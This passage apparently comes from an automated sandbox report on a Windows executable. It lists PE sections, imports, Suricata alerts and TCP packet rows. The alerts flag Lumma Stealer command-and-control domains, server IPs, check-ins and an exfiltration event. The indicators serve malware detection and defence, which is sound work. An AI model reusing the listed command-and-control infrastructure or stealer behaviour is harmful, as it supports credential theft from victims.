                                                                  .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xf40000xe1760xe2005e2ec978b0037377ab64a965f33096aeFalse0.962890625data7.893830302947621IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x1030000xf320x100086c2ca7127e42dc0128c41106ccf5516False0.6005859375data5.524913322209985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xf42200x9327PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005574579915586
                                                                  RT_ICON0xfd5480x310aPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0008762147522703
                                                                  RT_ICON0x1006540x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.7871129326047359
                                                                  RT_ICON0x10177c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8714539007092199
                                                                  RT_DIALOG0x101be40x100dataEnglishUnited States0.5234375
                                                                  RT_DIALOG0x101ce40x11cdataEnglishUnited States0.6056338028169014
                                                                  RT_DIALOG0x101e000x60dataEnglishUnited States0.7291666666666666
                                                                  RT_GROUP_ICON0x101e600x3edataEnglishUnited States0.8387096774193549
                                                                  RT_MANIFEST0x101ea00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                  Imports

                                                                  DLLImport
                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-15T16:01:50.261993+01002059189ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)1192.168.2.5624701.1.1.153UDP
                                                                  2025-01-15T16:01:50.286997+01002059211ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)1192.168.2.5527051.1.1.153UDP
                                                                  2025-01-15T16:01:50.299901+01002059201ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)1192.168.2.5598931.1.1.153UDP
                                                                  2025-01-15T16:01:50.310499+01002059203ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)1192.168.2.5606851.1.1.153UDP
                                                                  2025-01-15T16:01:50.322617+01002059199ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)1192.168.2.5589081.1.1.153UDP
                                                                  2025-01-15T16:01:50.333690+01002059207ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)1192.168.2.5604611.1.1.153UDP
                                                                  2025-01-15T16:01:50.345676+01002059209ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)1192.168.2.5623631.1.1.153UDP
                                                                  2025-01-15T16:01:50.356372+01002059191ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)1192.168.2.5536441.1.1.153UDP
                                                                  2025-01-15T16:01:51.030285+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549850104.102.49.254443TCP
                                                                  2025-01-15T16:01:51.730718+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549850104.102.49.254443TCP
                                                                  2025-01-15T16:01:51.838296+01002059241ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aleksandr-block .com)1192.168.2.5546711.1.1.153UDP
                                                                  2025-01-15T16:01:52.367497+01002059242ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI)1192.168.2.549861188.114.96.3443TCP
                                                                  2025-01-15T16:01:52.367497+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549861188.114.96.3443TCP
                                                                  2025-01-15T16:01:52.863072+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549861188.114.96.3443TCP
                                                                  2025-01-15T16:01:52.863072+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549861188.114.96.3443TCP
                                                                  2025-01-15T16:01:53.384566+01002059242ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI)1192.168.2.549870188.114.96.3443TCP
                                                                  2025-01-15T16:01:53.384566+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549870188.114.96.3443TCP
                                                                  2025-01-15T16:01:53.938385+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549870188.114.96.3443TCP
                                                                  2025-01-15T16:01:53.938385+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549870188.114.96.3443TCP
                                                                  2025-01-15T16:01:54.601533+01002059242ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI)1192.168.2.549878188.114.96.3443TCP
                                                                  2025-01-15T16:01:54.601533+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549878188.114.96.3443TCP
                                                                  2025-01-15T16:01:56.868721+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549878188.114.96.3443TCP
                                                                  2025-01-15T16:01:57.403632+01002059242ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI)1192.168.2.549895188.114.96.3443TCP
                                                                  2025-01-15T16:01:57.403632+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549895188.114.96.3443TCP
                                                                  2025-01-15T16:01:58.758864+01002059242ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI)1192.168.2.549905188.114.96.3443TCP
                                                                  2025-01-15T16:01:58.758864+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549905188.114.96.3443TCP
                                                                  2025-01-15T16:02:00.155105+01002059242ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI)1192.168.2.549913188.114.96.3443TCP
                                                                  2025-01-15T16:02:00.155105+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549913188.114.96.3443TCP
                                                                  2025-01-15T16:02:01.439573+01002059242ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI)1192.168.2.549922188.114.96.3443TCP
                                                                  2025-01-15T16:02:01.439573+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549922188.114.96.3443TCP
                                                                  2025-01-15T16:02:03.680928+01002059242ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI)1192.168.2.549936188.114.96.3443TCP
                                                                  2025-01-15T16:02:03.680928+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549936188.114.96.3443TCP
                                                                  2025-01-15T16:02:04.255965+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549936188.114.96.3443TCP
                                                                  2025-01-15T16:02:04.854584+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549944162.159.135.233443TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 15, 2025 16:01:50.384768009 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:50.384793043 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:50.384855986 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:50.386266947 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:50.386282921 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.030199051 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.030284882 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.034890890 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.034905910 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.035306931 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.077508926 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.270581961 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.315329075 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.730568886 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.730602026 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.730645895 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.730657101 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.730654955 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.730693102 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.730706930 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.730720997 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.730736971 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.730762005 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.825356007 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.825428009 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.825473070 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.825508118 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.825551033 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.825576067 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.830144882 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.830230951 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.834800005 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.834868908 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.834882021 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.834960938 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.835076094 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.835618973 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.835639954 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.835705042 CET49850443192.168.2.5104.102.49.254
                                                                  Jan 15, 2025 16:01:51.835712910 CET44349850104.102.49.254192.168.2.5
                                                                  Jan 15, 2025 16:01:51.850811005 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:51.850852966 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:51.850996017 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:51.851536036 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:51.851552963 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.367434025 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.367496967 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.369148970 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.369160891 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.369462967 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.371668100 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.371686935 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.371737957 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.863164902 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.863440990 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.864728928 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.865655899 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.865662098 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.865677118 CET49861443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.865680933 CET44349861188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.870574951 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.870629072 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:52.870716095 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.871052980 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:52.871072054 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.384449005 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.384566069 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.385761976 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.385780096 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.386121988 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.389594078 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.389625072 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.389734983 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.938488007 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.938653946 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.938724041 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.938730001 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.938757896 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.938802958 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.938817024 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.938972950 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.939063072 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.939088106 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.939095974 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.939131975 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.939148903 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.939291954 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.939342976 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.939351082 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.943362951 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.943430901 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:53.943438053 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:53.983786106 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.028845072 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.029043913 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.029117107 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.029130936 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.029169083 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.029385090 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.029444933 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.029562950 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.029583931 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.029598951 CET49870443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.029604912 CET44349870188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.101967096 CET49878443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.101995945 CET44349878188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.102088928 CET49878443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.102519035 CET49878443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.102535009 CET44349878188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.601378918 CET44349878188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.601532936 CET49878443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.603219986 CET49878443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.603228092 CET44349878188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.603568077 CET44349878188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:54.604932070 CET49878443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.605077982 CET49878443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:54.605115891 CET44349878188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:56.868798018 CET44349878188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:56.869040012 CET44349878188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:56.869142056 CET49878443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:56.869323015 CET49878443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:56.869343996 CET44349878188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:56.884555101 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:56.884594917 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:56.884684086 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:56.884960890 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:56.884974003 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:57.403547049 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:57.403631926 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:57.404890060 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:57.404903889 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:57.405354023 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:57.406753063 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:57.406891108 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:57.407216072 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:57.407274961 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:57.447339058 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.109735966 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.110080004 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.110126972 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.117031097 CET49895443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.117048025 CET44349895188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.254898071 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.254950047 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.255016088 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.255345106 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.255361080 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.758783102 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.758863926 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.760531902 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.760546923 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.761039019 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.762438059 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.762629986 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.762666941 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:58.762741089 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:58.762749910 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:59.477837086 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:59.477968931 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:59.478025913 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:59.478171110 CET49905443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:59.478192091 CET44349905188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:59.668694973 CET49913443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:59.668735027 CET44349913188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:01:59.668811083 CET49913443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:59.669156075 CET49913443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:01:59.669167995 CET44349913188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:00.155002117 CET44349913188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:00.155105114 CET49913443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:00.156647921 CET49913443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:00.156666994 CET44349913188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:00.156996965 CET44349913188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:00.158870935 CET49913443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:00.159028053 CET49913443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:00.159040928 CET44349913188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:00.511178017 CET44349913188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:00.511301994 CET44349913188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:00.511396885 CET49913443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:00.511642933 CET49913443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:00.511662006 CET44349913188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:00.929617882 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:00.929665089 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:00.930166006 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:00.930166006 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:00.930210114 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.439491987 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.439573050 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.440987110 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.440998077 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.441279888 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.443110943 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.443947077 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.443981886 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.444091082 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.444122076 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.444248915 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.444287062 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.444430113 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.444462061 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.444618940 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.444657087 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.444886923 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.444919109 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.444930077 CET49922443192.168.2.5188.114.96.3
